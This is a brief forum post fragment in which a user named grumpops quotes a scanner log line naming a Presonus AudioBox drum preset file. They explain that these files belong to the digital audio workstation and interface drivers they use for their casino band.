c:\users\sal\documents\presonus\audioboxvsl\library\fat\drm_snarecrackalak.xml
scanner sequence 3.BB.11.MXAPFZ
----- EOF -----

Presonus files are all important...it's my DAW (Digital Audio Workstation) for doing tracks for my Casino band.
AudioBox is the drivers for the Digital Interface between the DAW and my PA system.
grumpops is offline  